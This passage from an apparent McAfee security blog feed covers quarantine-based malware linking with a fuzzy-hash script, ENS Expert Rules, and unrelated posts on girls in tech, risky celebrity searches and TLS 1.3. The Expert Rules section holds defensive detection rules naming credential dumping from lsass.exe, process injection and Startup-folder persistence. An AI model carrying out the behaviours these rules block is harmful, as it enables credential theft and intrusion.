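ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
WINDOW = 7        # bytes of context that decide where a chunk boundary falls
BLOCK_SIZE = 64   # a boundary fires when the context hash equals BLOCK_SIZE - 1
FNV_OFFSET, FNV_PRIME = 0x811C9DC5, 0x01000193


def fuzzy_hash(data: bytes) -> str:
    """One alphabet character per chunk.  Chunk boundaries depend only on the
    last WINDOW bytes, so a local edit perturbs only nearby characters of the
    signature instead of shifting everything after it (unlike a plain hash)."""
    signature = []
    window = deque(maxlen=WINDOW)
    chunk_hash = FNV_OFFSET
    for byte in data:
        window.append(byte)
        chunk_hash = ((chunk_hash ^ byte) * FNV_PRIME) & 0xFFFFFFFF  # FNV-1a
        context = sum((i + 1) * v for i, v in enumerate(window)) % BLOCK_SIZE
        if context == BLOCK_SIZE - 1:
            signature.append(ALPHABET[chunk_hash & 63])
            chunk_hash = FNV_OFFSET
    signature.append(ALPHABET[chunk_hash & 63])  # trailing partial chunk
    return "".join(signature)


def similarity(sig_a: str, sig_b: str) -> int:
    """0..100 score: 100 for identical signatures, low for unrelated ones."""
    return round(100 * difflib.SequenceMatcher(None, sig_a, sig_b).ratio())


def link_to_campaign(sample: bytes, known: dict, threshold: int = 60):
    """Compare a quarantined sample against reference samples of known targeted
    attacks.  Returns (campaign, score) for the best match at or above the
    threshold, or (None, best_score) when nothing is similar enough."""
    sample_sig = fuzzy_hash(sample)
    best_name, best_score = None, 0
    for name, reference in known.items():
        score = similarity(sample_sig, fuzzy_hash(reference))
        if score > best_score:
            best_name, best_score = name, score
    if best_score < threshold:
        return None, best_score
    return best_name, best_score


def make_samples():
    """Constructed stand-ins for binaries: a reference sample, a variant with a
    few patched bytes plus a small insertion (the kind of change a re-packed
    or re-built variant shows), and an unrelated file of the same size."""
    rng = random.Random(2019)
    reference = bytes(rng.getrandbits(8) for _ in range(4096))
    patched = bytearray(reference)
    for offset in (300, 1700, 3100):
        patched[offset] ^= 0xFF
    variant = bytes(patched[:2048]) + b"\x00" * 16 + bytes(patched[2048:])
    unrelated = bytes(rng.getrandbits(8) for _ in range(4096))
    return reference, variant, unrelated


if __name__ == "__main__":
    reference, variant, unrelated = make_samples()
    known = {"constructed-campaign-A": reference}   # constructed label
    print(link_to_campaign(variant, known))    # linked to constructed-campaign-A
    print(link_to_campaign(unrelated, known))  # (None, low score)
```

Polymorphic variants that re-encode the whole body defeat byte-level CTPH entirely, which is the limitation the paragraph above reports and the reason a semantic (instruction-level) comparison was adopted.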

Architecture

Figure 1 shows the overall architecture of our system:

[Figure 1: McAfee ENS detects a suspicious sample by studying its behavior or other means and then moves the sample file to the quarantine folder. The scheduled execution of the GetQuarantine Tool, configured in ePO as a scheduled task, submits the sample to the McAfee backend. The third-party analytics app periodically receives samples from the McAfee backend for further analysis.]

Case Study

For a case study, we used samples from a McAfee discovered campaign, Oceansalt. We tested the solution’s ability to group samples using semantic similarity and also tested the solution’s ability to identify new variants of Oceansalt samples.

Illustration of the Solution’s Ability to Group Malware From Quarantine

McAfee Endpoint Security (ENS) detected two samples of Oceansalt (as listed in Table 1). GetQuarantine submitted these samples to the McAfee backend. Targeted attack analysis of these files showed a semantic similarity of 95.1%. The comparison of their control-flow graphs in Figure 2 justifies the high semantic similarity score.

[Table 1: Oceansalt samples reported by McAfee™ security operation center in June-July 2018.]

[Figure 2: Control-flow graph of Oceansalt samples from Table 1]

Illustration of the Solution’s Ability to Link New Variants From the Wild to a Known Targeted Attack

Finally, we come to the use case that motivated this study. Malware belonging to a targeted attack is identified by its file hashes. However, attackers use polymorphism and other obfuscations to create new variants. Though McAfee ENS may block such variants, it may not link them to the original attack. Targeted attack analytics can help fill this void.

To test the solution’s ability to locate such targeted attacks, we uploaded an Oceansalt sample (MD5: 531DEE019792A089A4589C2CCE3DAC95 [VT]) to MAGIC and identified it as an APT. We then uploaded a large number (thousands) of malware samples via GetQuarantine. As we expected, targeted attack analytics sent an alert that it had detected variants of Oceansalt (Figure 3).

[Figure 3: Alert about detecting an Oceansalt variant in the quarantine]

MAGIC’s alert was triggered because it found two Oceansalt variants from the wild which were not previously reported by the McAfee SOC or any other global threat intelligence.

[Table 2: Two new variants of Oceansalt samples found using semantic similarity]

Try Your Quarantine

We tested the GetQuarantine-based solution in our lab and found encouraging results. If you would like to try out this solution use the following steps, along with McAfee Endpoint Security (ENS):

  • Download the beta version of GetQuarantine, a proprietary licensed freeware.
  • Deploy it using the ePO ecosystem.
  • On successful sample submission to the McAfee backend, receive an acknowledgment email.

To obtain analysis results from the third-party analytics app, follow these steps:

  • Visit Cythereal MAGIC™.
  • The MAGIC dashboard contains plots with details about various ongoing campaigns.
  • Upon selecting a campaign in the plot, a table with all the associated malware is displayed where the customer can download samples and YARA rules.
  • Whenever MAGIC detects a targeted attack, it sends an alert email to the registered email address of the customer, along with additional threat intelligence, such as information on the threat group, third-party research on the group, and associated IoCs. Customers can also see the list of alerts on the MAGIC website.

Summary

As you can see from this exercise, traditional AV still has a lot to offer and can play an important role in an overall security strategy against targeted attacks. We can amplify the signals coming out of AV detections using tools like GetQuarantine and by running analytics on quarantine artifacts to uncover targeted attacks. We can take an incremental approach to solving targeted attack challenges.

The post Did You Check Your Quarantine?! appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/did-you-check-your-quarantine/feed/ 0
7 Ways to Help Girls Pursue Their Passion for Tech https://www.mcafee.com/blogs/consumer/family-safety/7-ways-to-help-girls-pursue-their-passion-for-tech/ https://www.mcafee.com/blogs/consumer/family-safety/7-ways-to-help-girls-pursue-their-passion-for-tech/#respond Sat, 26 Oct 2019 14:00:19 +0000 https://securingtomorrow.mcafee.com/?p=97218


The post 7 Ways to Help Girls Pursue Their Passion for Tech appeared first on McAfee Blogs.

]]>

One of my favorite binges of late is the Netflix series Halt and Catch Fire. It’s a story about the personal computer revolution of the 1980s. The lead character, Cameron Howe, is a brilliant, self-assured young woman who runs circles around her, mostly male, co-workers, with her mad coding skills.

I remember being influenced by a similar female lead. It was Jane Craig (played by Holly Hunter) in the movie Broadcast News. As the credits rolled, I knew I wanted to be a journalist. Likewise, Cameron Howe (played by Mackenzie Davis) possesses just the right mix of courage and intellect required to spark the tech fire in girls today.

STEM and beyond

What better way to close out our National Cybersecurity Awareness Month (NCSAM) series than to encourage the next generation of cybersecurity superheroes to grow their STEM (Science, Technology, Engineering, Math) skills and consider a future in cybersecurity?

Cybersecurity is a rewarding career, boasting an average salary of $96,000, and yet few women pursue the field. According to The U.S. Department of Labor, employment opportunities for Information Security Analysts will grow by 28% between 2016 and 2026. It’s also predicted that 3.5 million jobs in cybersecurity will remain unfilled by 2021.

Why focus on girls? Because while the numbers are improving, in the tech field or otherwise, in 2019, women are still paid 80 cents for every dollar their male counterparts earn, and 93.4 percent of Fortune 500 CEOs are men.

If your daughter shows a talent for tech, here are a few ways to nurture that passion.

  1. Challenge stereotypes. Girls get steeped in pink from the moment they arrive in the delivery room. This “pinkification,” in general, experts argue, is one factor distracting girls from pursuing tech. Consider the conscious and even unconscious ways you may be deterring your daughter from pursuing traditionally male subjects such as computers, engineering, robotics, or programming. Challenge perceptions like the one a 2012 Girl Scouts study found: a common belief that girls are not high achievers in math and science. However, a study by the American Association of University Women found high school girls and boys perform equally in the subjects.
  2. Expose her to the rock stars. Women like YouTube CEO Susan Wojcicki, Facebook’s Sheryl Sandberg, HP’s Meg Whitman, and Google coder Marisa Mayer are great role models for girls today. Also, choose media (check ratings before viewing to stay age-appropriate) with strong female leads who excel in tough career fields.
  3. Ask her. How many times do we make assumptions and skip this crucial step in parenting? Ask your daughter what camps appeal most to her, what activities she enjoys, what qualities she admires most in others, and what she dreams of achieving.
  4. Don’t overdo it. If your daughter has a natural ability in STEM subjects, don’t push too hard. She will find her path. Suggest adjacent activities to complement her strengths. Is she good at math? Encourage a musical instrument as a hobby. Good at science? Suggest cooking or gardening to complement her love for creative problem-solving. Integrate creative activities such as art, writing, or theatre.
  5. Seek out tech opportunities. Few kids will pursue experiences on their own, so consider giving them a nudge. Encourage age-appropriate camps, clubs, and activities that play to her strengths. The choices in quality camps — rocketry, science, coding, physics — are endless. Be your daughter’s tech companion. Take her to a women’s tech conference so she can begin to visualize her future and meet women who work in the field. Encourage an internship or even a job shadowing opportunity during high school or college, like this one that changed Gwendolyn’s career path.
  6. Model, teach resilience. The tech field tends to be a male-dominated culture of “brogrammers,” which can be intimidating for women. For this reason, your daughter may need to develop a tough skin and learn to push through obstacles with ease.
  7. Help her find her people. Organizations like Girls Go Cyberstart, Girls Who Code, Code.org, and uscyberpatriot.org can be game-changers for a tech-minded girl and help grow her passion among peers.

Cybersecurity is one of the fastest-growing, in-demand professions out there. With the rise in security breaches of all kinds, it’s also a field experts say is “future proof.” If your daughter shows a desire to fight the bad guys and make her mark safeguarding the digital realm, then cybersecurity may be the best place for her to start blazing her trails.

The post 7 Ways to Help Girls Pursue Their Passion for Tech appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/consumer/family-safety/7-ways-to-help-girls-pursue-their-passion-for-tech/feed/ 0
McAfee Reveals the Most Dangerous Celebrities Across the Globe https://www.mcafee.com/blogs/consumer/consumer-threat-notices/global-most-dangerous-celebrities-2019/ https://www.mcafee.com/blogs/consumer/consumer-threat-notices/global-most-dangerous-celebrities-2019/#respond Fri, 25 Oct 2019 16:02:21 +0000 https://securingtomorrow.mcafee.com/?p=97200


The post McAfee Reveals the Most Dangerous Celebrities Across the Globe appeared first on McAfee Blogs.

]]>

Earlier this week, we revealed McAfee’s Most Dangerous Celebrity of 2019 in the U.S., Alexis Bledel. Growing from a young actress in “Gilmore Girls” to Ofglen in “A Handmaid’s Tale,” Bledel’s rising stardom helps to explain why she topped this year’s list. But, is that the case in other parts of the world as well? It’s time to take a trip around the globe and see which celebrities are considered risky in different regions.

In McAfee’s 13th annual study on the riskiest celebrities to search for online, the stars topping each list varied from country to country. While Bledel sits at the top of the most dangerous celebrity list in the U.S., singer Camila Cabello is ranked No. 1 in Spain. In Germany, model and TV personality Heidi Klum and actress Emilia Clarke tied for the country’s riskiest celebrity. Caroline Flack, the host of reality dating show “Love Island,” came in No. 1 in the U.K. In France, actor/producer Jamel Debbouze topped the list of the country’s most dangerous celebrities. At the top of India’s most dangerous celebrity tally is international cricketer M.S. Dhoni. And, finally, rounding out the list of the riskiest celebrities around the world are comedian, actor, and TV host John Oliver in Australia and Malaysian actress Michelle Yeoh in Singapore.

Many users don’t realize that simple internet searches of their favorite celebrities could potentially lead to malicious content, as cybercriminals often leverage these popular searches to entice users to click on dangerous links. And while this year’s list of riskiest celebrities might vary from country to country, cybercriminals’ use of trending celebrities and pop culture icons continues to be an avenue used to exploit users’ security. It’s for these reasons that users must understand the importance of taking precautions when it comes to searching for the latest news on their favorite celebrities.

So, whether you’re checking out what Alexis Bledel has been up to since “Gilmore Girls” or looking for the latest drama on “Love Island” with Caroline Flack, be a proactive fan and follow these security tips when browsing the internet:

  • Be careful what you click. Users looking for information on their favorite celebrities should be cautious and only click on links to reliable sources for downloads. The safest thing to do is to wait for official releases instead of visiting third-party websites that could contain malware.
  • Refrain from using illegal streaming sites. When it comes to dangerous online behavior, using illegal streaming sites could wreak havoc on your device. Many illegal streaming sites are riddled with malware or adware disguised as pirated video files. Do yourself a favor and stream the show from a reputable source.
  • Protect your online safety with a cybersecurity solution. Safeguard yourself from cybercriminals with a comprehensive security solution like McAfee Total Protection. This can help protect you from malware, phishing attacks, and other threats.
  • Use a website reputation tool. Use a website reputation tool such as McAfee WebAdvisor, which alerts users when they are about to visit a malicious site.
  • Use parental control software. Kids are fans of celebrities too, so ensure that limits are set for your child on their devices and use parental control software to help minimize exposure to potentially malicious or inappropriate websites.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow me and @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post McAfee Reveals the Most Dangerous Celebrities Across the Globe appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/consumer/consumer-threat-notices/global-most-dangerous-celebrities-2019/feed/ 0
Using Expert Rules in ENS to Prevent Malicious Exploits https://www.mcafee.com/blogs/other-blogs/mcafee-labs/using-expert-rules-in-ens-10-5-3-to-prevent-malicious-exploits/ https://www.mcafee.com/blogs/other-blogs/mcafee-labs/using-expert-rules-in-ens-10-5-3-to-prevent-malicious-exploits/#respond Fri, 25 Oct 2019 15:41:38 +0000 https://securingtomorrow.mcafee.com/?p=97184


The post Using Expert Rules in ENS to Prevent Malicious Exploits appeared first on McAfee Blogs.

]]>

Expert Rules are text-based custom rules that can be created in the Exploit Prevention policy in ENS Threat Prevention 10.5.3+. Expert Rules provide additional parameters and allow much more flexibility than the custom rules that can be created in the Access Protection policy. They also allow system administrators to control and monitor an endpoint system at a very granular level. Expert Rules do not rely on user-mode hooking; hence they have very minimal impact on a system’s performance. This blog is a basic guide to show our customers how to create them and which threats they can help block. Further detailed information can be found in the conclusion.

How Expert Rules work

The following sections show how to add Expert rules via EPO and ENS.

Adding an Expert Rule from EPO

1. Select System Tree | Subgroup (e.g.: ens_10.6.0) | Assigned Policies | Product (Endpoint Security Threat Prevention) | Exploit Prevention (My Default)

2. Navigate to Signatures and click on Add Expert Rule.

3. In the Rules section, complete the fields.

a. Select the severity and action for the rule. The severity provides information only; it has no effect on the rule action.

b. Select the type of rule to create. The Rule content field is populated with the template for the selected type.

c. Change the template code to specify the behavior of the rule.

When you select a new class type, the code in the Rule content field is replaced with the corresponding template code. Endpoint Security assigns the ID number automatically, starting with 20000. Endpoint Security does not limit the number of Expert Rules you can create.

4. Save the rule, then save the settings.

5. Enforce the policy to a client system.

6. Validate the new Expert Rule on the client system.

Adding an Expert Rule directly at the Endpoint:

If an expert rule is added from EPO, it is pushed to all endpoints of the entire EPO “WORKGROUP”. There could be situations where expert rules need to be applied to only one or two systems, or to ENS systems which are not managed by EPO (a non-corporate environment where ENS is installed from a standalone setup); in those cases, the expert rule must be added directly at the endpoint. Expert rules can be written and applied directly at the endpoint system using the McAfee Endpoint Security UI. The steps are below:

1. Open McAfee Endpoint Security. Go to Settings.

2. Go to Threat Prevention | Show Advanced.

3. Scroll Down to Expert Rule Section and then click on Add Expert Rule.

4. The expert rule compiler should pop up where an end user can directly write and compile expert rules and, upon compilation, enforce the rules to the system.

If there is no syntax error in the expert rule, it can be applied to the system by clicking on the Enforce button. In case there is a syntax error, the details can be found in the log file %ProgramData%\McAfee\Endpoint Security\Logs\ExploitPrevention_Debug.log

Testing the Rules

When new rules are created, they should first be tested in ‘Report’ mode so that the detections can be observed. When enough confidence in the rule has been gained, it can be turned to ‘Block’ mode.

Expert Rule Examples:


Basic Rule:

The following rule will detect an instance of cmd.exe creating any file at c:\temp. Please note that cmd.exe might be run by any user and from any part of the system.

Rule {
    Process {
        Include OBJECT_NAME { -v "cmd.exe" }
    }
    Target {
        Match FILE {
            Include OBJECT_NAME { -v "c:\\temp\\**" }
            Include -access "CREATE"
        }
    }
}

Rules which target specific malicious behavior:

The following rules can be created to help block specific malicious activity which is performed by various malware families and attack techniques.


Expert Rule to Block Remote Process Injection [MITRE Technique Process Injection T1055]:

Rule {
    Process {
        Include OBJECT_NAME { -v "**" }
        Exclude OBJECT_NAME { -v "SYSTEM" }
        Exclude OBJECT_NAME { -v "%windir%\\System32\\WBEM\\WMIPRVSE.EXE" }
        Exclude OBJECT_NAME { -v "%windir%\\System32\\CSRSS.EXE" }
        Exclude OBJECT_NAME { -v "%windir%\\System32\\WERFAULT.EXE" }
        Exclude OBJECT_NAME { -v "%windir%\\System32\\SERVICES.EXE" }
        Exclude OBJECT_NAME { -v "*\\GOOGLE\\CHROME\\APPLICATION\\CHROME.EXE" }
    }
    Target {
        Match THREAD {
            Include OBJECT_NAME { -v "**" }
            Exclude OBJECT_NAME { -v "**\\MEMCOMPRESSION" }
            Exclude OBJECT_NAME { -v "%windir%\\System32\\WERFAULT.EXE" }
            Include -access "WRITE"
        }
    }
}

Expert Rule which prevents the powershell.exe and powershell_ise.exe processes from dumping credentials by accessing lsass.exe memory [MITRE Technique Credential Dumping T1003]:

Rule {
    Process {
        Include OBJECT_NAME { -v "powershell.exe" }
        Include OBJECT_NAME { -v "powershell_ise.exe" }
        Exclude VTP_PRIVILEGES -type BITMASK { -v 0x8 }
    }
    Target {
        Match PROCESS {
            Include OBJECT_NAME { -v "lsass.exe" }
            Include -nt_access "!0x10"
            Exclude -nt_access "!0x400"
        }
    }
}

Expert Rule which prevents creation of a suspicious task (PowerShell script or batch file) using the “SchTasks.exe” utility [MITRE Technique Scheduled Task T1053]:

Rule {
    Process {
        Include OBJECT_NAME { -v "SchTasks.exe" }
        Include PROCESS_CMD_LINE { -v "*/Create*" }
    }
    Target {
        Match PROCESS {
            Include PROCESS_CMD_LINE { -v "**.bat**" }
        }
        Match PROCESS {
            Include PROCESS_CMD_LINE { -v "**.ps1**" }
        }
    }
}

Expert Rule to prevent Start Up Entry Creation [MITRE Technique Persistence T1060]:

Adversaries can use several techniques to maintain persistence across system reboots. One of the most popular is creating entries in the Start Up folder. The following expert rule prevents any process from creating files in the Start Up folder. Recently, the internet has witnessed a full-fledged exploit of a decade-old WinRAR vulnerability (CVE-2018-20251) which can be exploited by dropping files in the Start Up directory; the following expert rule also blocks such an attempt.

Rule {
    Process {
        Include OBJECT_NAME { -v "**" }
    }
    Target {
        Match FILE {
            Include OBJECT_NAME { -v "**\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\**" }
            Include -access "CREATE WRITE"
        }
    }
}

Expert Rule which blocks JavaScript Execution within Adobe Reader:

Exploiting a client-side software vulnerability to gain an initial foothold in a network is not new [MITRE Technique T1203]. Adobe Reader is a very popular target because, like any browser, it supports JavaScript, which makes exploitation much easier. The following expert rule can be deployed in any network to prevent Adobe Reader from executing any kind of JavaScript.

Rule {
    Process {
        Include OBJECT_NAME { -v "AcroRd32.exe" }
    }
    Target {
        Match SECTION {
            Include OBJECT_NAME { -v "EScript.api" }
        }
    }
}
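The Process/Target matching that the rules above express, as an added Python evaluator that is not ENS code: it transcribes three of the rules (the basic cmd.exe rule, the process injection rule and the Start Up folder rule) into data and runs them over constructed events. The wildcard semantics ('*' stays within one path component, '**' also crosses separators), case-insensitive matching, file-name-only matching for a pattern without a backslash, and the %windir% expansion to C:\Windows are assumptions of this example, not documented ENS behaviour.

```python
import re

# Assumed expansion of environment placeholders used in the rules above.
ENV = {"%windir%": r"C:\Windows"}


def glob_to_regex(pattern: str):
    """Assumed wildcard semantics: '*' does not cross a '\\', '**' does."""
    for var, value in ENV.items():
        pattern = pattern.replace(var, value)
    parts, i = [], 0
    while i < len(pattern):
        if pattern.startswith("**", i):
            parts.append(".*")
            i += 2
        elif pattern[i] == "*":
            parts.append(r"[^\\]*")
            i += 1
        else:
            parts.append(re.escape(pattern[i]))
            i += 1
    return re.compile("^" + "".join(parts) + "$", re.IGNORECASE)


def object_matches(pattern: str, path: str) -> bool:
    # Assumption: a pattern without a separator (e.g. "cmd.exe") is compared
    # against the file name only; otherwise against the full path.
    subject = path if "\\" in pattern else path.rsplit("\\", 1)[-1]
    return glob_to_regex(pattern).match(subject) is not None


def section_matches(section: dict, path: str) -> bool:
    """Include lines are OR-ed together; any matching Exclude line vetoes."""
    included = any(object_matches(p, path) for p in section["include"])
    excluded = any(object_matches(p, path) for p in section.get("exclude", []))
    return included and not excluded


def rule_fires(rule: dict, event: dict) -> bool:
    target = rule["target"]
    if not section_matches(rule["process"], event["process"]):
        return False
    if event["type"] != target["type"] or not section_matches(target, event["object"]):
        return False
    # "Include -access" lists the access types that trigger the rule (any of them)
    return bool(target["access"] & event["access"])


# The "Basic Rule" (cmd.exe creating a file under c:\temp) as data
CMD_TEMP_RULE = {
    "process": {"include": ["cmd.exe"]},
    "target": {"type": "FILE", "include": ["c:\\temp\\**"], "access": {"CREATE"}},
}
# The remote process injection rule (T1055) with its exclusions
INJECTION_RULE = {
    "process": {"include": ["**"],
                "exclude": ["SYSTEM", "%windir%\\System32\\WBEM\\WMIPRVSE.EXE",
                            "%windir%\\System32\\CSRSS.EXE", "%windir%\\System32\\WERFAULT.EXE",
                            "%windir%\\System32\\SERVICES.EXE",
                            "*\\GOOGLE\\CHROME\\APPLICATION\\CHROME.EXE"]},
    "target": {"type": "THREAD", "include": ["**"],
               "exclude": ["**\\MEMCOMPRESSION", "%windir%\\System32\\WERFAULT.EXE"],
               "access": {"WRITE"}},
}
# The Start Up folder persistence rule (T1060)
STARTUP_RULE = {
    "process": {"include": ["**"]},
    "target": {"type": "FILE", "access": {"CREATE", "WRITE"},
               "include": ["**\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\**"]},
}


def event(process: str, kind: str, obj: str, *access: str) -> dict:
    return {"process": process, "type": kind, "object": obj, "access": set(access)}


# Constructed events, not real telemetry
CMD_CREATES_TEMP = event(r"C:\Windows\System32\cmd.exe", "FILE", r"C:\temp\sub\out.txt", "CREATE")
CMD_READS_TEMP = event(r"C:\Windows\System32\cmd.exe", "FILE", r"C:\temp\out.txt", "READ")
CMD_CREATES_ELSEWHERE = event(r"C:\Windows\System32\cmd.exe", "FILE", r"C:\Users\a\out.txt", "CREATE")
WORD_WRITES_THREAD = event(r"C:\Program Files\Office\WINWORD.EXE", "THREAD", r"C:\Windows\explorer.exe", "WRITE")
CSRSS_WRITES_THREAD = event(r"C:\Windows\System32\csrss.exe", "THREAD", r"C:\Windows\explorer.exe", "WRITE")
WORD_WRITES_MEMCOMP = event(r"C:\Program Files\Office\WINWORD.EXE", "THREAD", r"\MemCompression", "WRITE")
CHROME_WRITES_THREAD = event(r"C:\Program Files\Google\Chrome\Application\chrome.exe", "THREAD",
                             r"C:\Windows\explorer.exe", "WRITE")
ARCHIVER_DROPS_STARTUP = event(r"C:\Program Files\Archiver\archiver.exe", "FILE",
                               r"C:\Users\a\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\u.exe",
                               "CREATE")

if __name__ == "__main__":
    for name, rule, ev in [("cmd->temp", CMD_TEMP_RULE, CMD_CREATES_TEMP),
                           ("csrss thread write", INJECTION_RULE, CSRSS_WRITES_THREAD),
                           ("chrome thread write", INJECTION_RULE, CHROME_WRITES_THREAD),
                           ("archiver->Startup", STARTUP_RULE, ARCHIVER_DROPS_STARTUP)]:
        print(f"{name}: {'BLOCK' if rule_fires(rule, ev) else 'allow'}")
```

Under the example's single-'*' assumption the Chrome exclusion in the injection rule does not cover a chrome.exe installed under Program Files, which is exactly the kind of gap that running a new rule in Report mode first is meant to surface before switching to Block mode.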

The table below shows how the above Expert Rules line up in the MITRE ATT&CK matrix.

Conclusion

There are many more rules which can be created within Exploit Prevention (part of McAfee’s ENS Threat Prevention) and they can be customized depending on the customer’s environment and requirements. For example, the Expert Rule which blocks JavaScript Execution within Adobe Reader will be of no use if an organization does not use “Adobe Reader” software. To fully utilize this feature, we recommend our customers read the following guides:

https://kc.mcafee.com/resources/sites/MCAFEE/content/live/PRODUCT_DOCUMENTATION/27000/PD27227/en_US/ens_1053_rg_ExpertRules_0-00_en-us.pdf

https://kc.mcafee.com/corporate/index?page=content&id=KB89677


Disclaimer: The expert rules used here as examples can cause a significant number of false positives in some environments; hence we recommend that these rules be applied only in environments where better visibility of the above (or similar) events at a granular level is required.

Acknowledgement:

The author would like to thank the following colleagues for their help and input in authoring this blog.

  • Oliver Devane
  • Abhishek Karnik
  • Cedric Cochin

The post Using Expert Rules in ENS to Prevent Malicious Exploits appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/using-expert-rules-in-ens-10-5-3-to-prevent-malicious-exploits/feed/ 0
It’s About Time: Cybersecurity Insights, Visibility, and Prioritization https://www.mcafee.com/blogs/enterprise/its-about-time-cybersecurity-insights-visibility-and-prioritization/ https://www.mcafee.com/blogs/enterprise/its-about-time-cybersecurity-insights-visibility-and-prioritization/#respond Thu, 24 Oct 2019 20:23:23 +0000 https://securingtomorrow.mcafee.com/?p=97164


The post It’s About Time: Cybersecurity Insights, Visibility, and Prioritization appeared first on McAfee Blogs.

]]>

As McAfee Chief Executive Officer Chris Young said in his 2019 MPOWER Cybersecurity Summit keynote address, time is the most valuable resource that we all share. But time isn’t always on our side – especially when it comes to cybersecurity.

“Time is the one constant that we cannot change. It’s the one constraint that we cannot ignore. Every second counts,” Young said. “… Our adversaries are using time to their advantage. It’s the single greatest weapon they have. It’s taken over the language of our industry. Persistence. Dwell time. Used to describe the time the work that our adversaries do as they run up the clock until they try to exfiltrate our most sensitive information. Versus ransomware, which applies time pressure to run down the clock. If you don’t pay the ransom you’ll lose your data forever. Zero-day attacks. Mean time to detect. Mean time to respond. These are just a few of the many, many examples of the way time is woven into the fabric of our industry.”

Time is a major challenge for organizations attempting to keep pace with cyber threats that are rapidly increasing in volume and complexity. Elevated efficiency is cybersecurity’s counterpunch against agile and elusive adversaries weaponizing time. Organizations that constantly find themselves in reactive mode struggle to maintain staff efficiency—but time and resources can be saved by using improved visibility and prioritization to get ahead of the threat curve.

The findings of an ESG paper commissioned by McAfee concurred: “Organizations want more visibility into cyber-risks so they can tailor and prioritize their threat response and risk remediation actions in alignment with threats that may hit them,” said Jon Oltsik, ESG fellow. “Many firms want to be more proactive but do not have the resources and talent to execute.”

Better cybersecurity intelligence and insights can enable organizations to assume a more proactive cybersecurity program without dramatically upgrading resources and talent.

Better Visibility Through Next Generation Open Architecture

Modern adversaries are using next-generation tools, tactics and techniques to evade traditional reactive security systems. The next generation of open cyberthreat identification, investigation, and response capabilities paired with human and artificial intelligence can enable organizations to answer key questions about how to respond to threats. Open architecture can enable security teams to add their own expertise and analytics, empowering insight into the high-impact threats that matter. Security analysts will need the right technology to do the analysis, a combination of human expertise and the most advanced artificial intelligence and machine-learning capabilities that provide insight as to which actions to take.

The diversity of the raw materials an organization uses matters. If you only have one type of sensor, such as endpoint, you’re limited in what you can see. Gaining insight requires the ability to look at a wide range of capabilities from traditional on-premise environments to the cloud. Sensors should cover on-premise, perimeter, network, endpoint, and cloud environments. From the data gathered by these sensors, security teams can then extract context, detecting the characteristics, structure, and behavior of suspicious activity. Efficiencies are empowered through diverse telemetry at scale.

Prioritization: Decoding the DNA of Cyber Threats

“We and the rest of the cybersecurity industry have to move beyond the hash,” said Steve Grobman, senior vice president and chief technology officer. “Features are a lot like markers in DNA and biology. By understanding the markers and characteristics, we can understand the structure, the behavior. We can understand what a threat is even if we’ve never seen it before. We can basically see the characteristics of a threat we’ve never seen before and have a very good understanding of what it actually is.”

Most security teams are constrained by the available data and by traditional indicators of compromise such as file hashes and IP addresses. An open architecture consisting of a variety of sensors provides the capability to gather more, and richer, information on a threat’s DNA.

The goal goes beyond a simple patch or remedy. It’s about being better able to understand the unknown through improved data and intelligence, and about being more efficient in dealing with the things that matter: the threats that are inherently difficult to detect, and the threats that are engineered to target you.

By gaining this understanding, you’ll be more able to answer strategic questions such as:

  • Am I protected from this threat?
  • What do I need on my platform in order to defend against this threat?
  • What is the technology?
  • What is the content?
  • What is the configuration I need to defend myself?
  • Was I protected when this threat impacted my environment on that very first day or the day that threat emerged?
  • What did I need to have zero-day protection?
  • Did I have the right real-protect model?

Intelligence that helps answer these questions can provide insight into not only how a threat fared against one organization’s security but how a security plan can proactively prepare for next-generation threats.

Anticipating Next-Generation Threats

Understanding threats is not just about protection but also anticipation, both of threats in your environment and on a global scale. Improved insights can leave organizations with a complete view of how a threat is impacting their environment.

Decoding the DNA of threats through an expanded variety of sensors can help organizations recognize and anticipate the next generation of threats:

  • Using a machine-learning algorithm that recognizes potentially malicious activity, extracts its characteristics and recognizes its similarities to threats we’ve seen before.
  • Finding outliers, i.e. things that have uncommon characteristics.
  • Finding things that appear to be engineered specifically for your environment. If something appears only in your environment and has characteristics that look different from anything seen before, that tells you it belongs at the top of your stack of investigation priorities, because it could be targeting you.
  • Identifying targeted attacks by mapping threats tied to specific industrial sectors and being able to cluster the highest level of intensity by sector.
  • Separating the noise from the signal.
  • Triaging the priority and raising the urgency on threats critical to your organization.

Gaining cybersecurity efficiency via visibility and prioritization isn’t only about gathering richer data. It’s also about having the right technology to do the analysis. It’s not just about being able to identify the things that matter, it’s about being able to take action with your current security staff. It’s about saving time against an adversary using time as a weapon.

Read more on how the McAfee MVISION Insights platform’s integration into the McAfee architecture provides better intelligence capable of empowering better insights.

The post It’s About Time: Cybersecurity Insights, Visibility, and Prioritization appeared first on McAfee Blogs.

TLS 1.3 and McAfee Web Gateway https://www.mcafee.com/blogs/enterprise/tls-1-3-and-mcafee-web-gateway/ https://www.mcafee.com/blogs/enterprise/tls-1-3-and-mcafee-web-gateway/#comments Wed, 23 Oct 2019 14:00:08 +0000 https://securingtomorrow.mcafee.com/?p=97159

The post TLS 1.3 and McAfee Web Gateway appeared first on McAfee Blogs.

With the introduction of TLS 1.3 in 2018, IETF’s goal was (and is) to make the Internet a safer and more secure place.

Legacy technologies such as the RSA key exchange have now been phased out, replaced by the much safer Diffie-Hellman key exchange. There are two main benefits to this method: not only is perfect forward secrecy achieved, but decryption after the fact is also no longer possible, since the relevant key cannot be recalculated. The use of elliptic-curve ciphers brings greater efficiency: the same strength can be reached with a smaller key, so the encryption uses fewer resources.

To support a safer Internet, adoption of TLS 1.3 is key. TLS 1.3 offers better security posture than its previous versions.

It is important that a web gateway supports TLS 1.3 to ensure a secure connection. McAfee Web Gateway version 8.2.0 supports TLS 1.3 in a bi-directional fashion. This helps organizations ensure that the connection from the internal client side has the same level of security as the connection on the outbound side (towards the server).

